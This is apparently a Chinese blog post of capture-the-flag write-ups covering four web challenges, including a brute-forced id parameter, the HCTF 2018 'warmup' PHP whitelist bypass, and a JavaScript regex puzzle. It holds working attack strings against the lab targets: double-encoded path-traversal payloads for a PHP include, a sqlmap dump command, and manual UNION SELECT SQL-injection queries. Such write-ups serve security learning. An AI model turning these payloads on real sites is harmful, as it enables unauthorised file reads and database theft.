持续更新ing
0x05 ics-06
题目描述: 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
打开题目发现只有报表管理可以点, 答案就应该在这里面,但查询也是假的,url中存在参数id,但没有注入,不管怎么输入都不会报错,换几个id号试试,发现都有返回,联系题目被藏在了某一处,爆破id号。
使用burp抓包进行id测试,生成1-10000的id号。
在id=2333中返回不同,且响应号为200。
找到flag。
0x06 warmup
题目描述: 来源HCTF 2018
查看源码找到source.php,访问查看代码。
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
关键部分为if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']))
,可见只要传入的file参数不为空、是字符串、满足checkFile条件即可。
在checkFile中有几个重要函数需要我们关注:
in_array($page, $whitelist) '检测page中的内容是不是在白名单中'
mb_substr($page, 0,mb_strpos($page . '?', '?') '截取指定位置之前的内容'
mb_strpos($page . '?', '?') '返回第一次问号出现的位置'
也就是在问号之前有白名单内的文件名即可。
访问 index.php?file=hint.php
得到提示。
这里需要使check函数返回真,有两处可以使用,一是index.php?file=hint.php?/../../../../ffffllllaaaagggg
或index.php?file=hint.php%3f/../../../../ffffllllaaaagggg
这里这两条payload是相同的,因为浏览器会自动解码一次,全部在第二个白名单检测中通过,没有进入urldecode那部分,从本地的复现也可以看出来。
通过了第二次return返回真,但是想要include文件时出现了错误,因为没有这样的文件名,而且跨目录也失败了,这里与很多大佬的wp不一样,也许是环境原因?。
这里用到第三个payload
index.php?file=hint.php%253f/../../../../ffffllllaaaagggg
这时会经过第三次check成功返回真,因为浏览器解码之后仍然找不到问号?
,从本地的返回中我们也可以看出。
在include文件时造成了目录穿越从而成功,这里本地复现时直接使用?隔开是不行的,不知道为什么很多大佬都写payload直接使用?
就可以,(这里应当是环境linux 的原因。)本地复现只能通过两次编码使传入的文件不存在跨目录才可以。
–8.28更新原因–
这里payload不同的原因应该在于win无法创建文件名称中带有?的文件而Linux可以,所以在include时win会直接报错, 但题目的环境应该是linux,所以多个大佬的payload都是可以的。。。
所以这里多个payload都是可以的,linux并不敏感
0x07 NewsCenter
题目描述: 如题目环境报错,稍等片刻刷新即可。
查询1与1’返回的页面不同,说明存在注入漏洞。
可以抓包保存成a.txt,直接使用 sqlmap -r a.txt -T secret_table -C fl4g --dump
一把梭,得到结果。
也阔以手注检验自己的掌握情况。
首先使用order by X,判断字段数,这里4时返回错误,说明共3个字段。
1' union select 1,2,3 #,然后使用联合查询判断回显位置。
发现回显在后两个字段,替换不同词组,查询敏感信息即可。
' union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #
查询所有表名。
' union select 1,2,column_name from information_schema.columns where table_name="secret_table" #
查询对应表中的字段。
' union select 1,2,fl4g from secret_table#
查询fl4g的值。
0x08 NaNNaNNaNNaN-Batman
题目描述: tinyctf-2014
给定的压缩包中是一个js源码,整理后为:
function $(){
var e=document.getElementById("c").value;
if(e.length==16)
if(e.match(/^be0f23/)!=null)
if(e.match(/233ac/)!=null)
if(e.match(/e98aa$/)!=null)
if(e.match(/c7be9/)!=null){
var t=["fl","s_a","i","e}"];
var n=["a","_h0l","n"];
var r=["g{","e","_0"];
var i=["it'","_","n"];
var s=[t,n,r,i];
for(var o=0;o<13;++o){
document.write(s[o%4][0]);s[o%4].splice(0,1)
}
}
}
document.write('<input id="c"><button οnclick=$()>Ok</button>');
可以发现当输入满足上面的正则且输入长度为16即可。
be0f23 233ac e98aa c7be9
现在的长度明显大于16了,需要将结果合并。
be0f233ac
为9位
c7be98aa
为8位,合并中间的c,刚好16位,输入be0f233ac7be98aa
即可。